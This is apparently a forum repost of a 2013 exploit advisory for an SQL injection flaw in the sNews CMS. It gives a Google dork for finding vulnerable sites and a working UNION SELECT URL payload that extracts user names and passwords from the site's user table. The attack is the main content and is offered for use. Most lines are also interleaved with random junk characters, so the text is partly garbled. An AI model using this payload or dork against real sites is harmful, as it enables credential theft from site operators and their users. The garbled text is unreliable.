标题: CMS snews SQL Injection Vulnerability
8 [( W# L) [ a" M& n$ S# I8 K作者: By onestree
5 |% Y# ~& v; x9 y+ L下载地址 : http://snewscms.com/, C. y/ _% I' v
测试平台 : ubuntu 12.10 / win 7
' H4 b4 q, M% \+ a" |关键词: inurl:"tanyakan pada rumput yang bergoyang"
[8 h! ^$ a& G 0 m2 s X# H% h' b6 h. q# {
% {* k( J3 s( p$ E- G* ]
*************************************************************
( s) L% U% h% p5 y4 }) ^ . C) v( G1 i( M& ^: ]
SQL poc:" u* C# ^2 [1 d" }( Z! w
/ Z0 W+ }; u; J* F: c% b9 w
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL] R, E. i, W K
; U4 J, X2 ^' N. d+ { r- R示例
6 `, d, k+ o; } 1 \ l1 @- W' G4 X
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* f, g- h- F9 X* C! k6 Q- \
+ I% T% H) A+ r( Y0 {" w
. a1 l# I2 m H致谢:+ [: S; d3 ?( R5 \
# J3 A9 C5 t6 g9 w5 L3 r! O Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
& y4 v; Y, C& b# i' U' V
2 h7 P p3 P2 }* g" h! j! ?; B4 ~0 s5 H indonesiancoder - moeslimh4x0r - go-coder2 r+ g/ S. B! y4 o, \4 u
0 v) `4 \; b! }5 Yspesial my hunny :*
; C* U6 Q- ^+ }3 b2 z- }- f |
发表于 2013-1-23 08:55:06
收藏
支持
反对